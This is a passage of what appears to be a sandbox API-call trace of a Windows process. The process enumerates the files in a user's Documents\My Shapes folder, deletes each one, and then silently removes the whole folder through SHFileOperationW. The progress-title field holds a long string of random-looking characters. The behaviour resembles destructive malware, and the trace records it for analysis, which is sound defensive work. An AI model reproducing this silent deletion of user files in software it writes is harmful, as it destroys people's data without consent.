(lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\desktop.ini")) returned 1 [0218.861] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0218.861] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\favorites.vssx")) returned 1 [0218.861] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_private", cAlternateFileName="")) returned 1 [0218.862] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_private", cAlternateFileName="")) returned 0 [0218.862] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0218.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854470 | out: hHeap=0x2af0000) returned 1 [0218.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0218.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0218.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.862] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0218.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0218.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0218.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0218.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0218.863] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0218.863] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0218.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38544e8 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0218.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d8e0 [0218.864] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Shapes", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes", lpFilePart=0x8cf650*="My Shapes") returned 0x23 [0218.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d8e0 | out: hHeap=0x2af0000) returned 1 [0218.865] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes")) returned 0x14 [0218.865] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Shapes", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Shapes", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38544e8 | out: hHeap=0x2af0000) returned 1 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0219.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0219.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 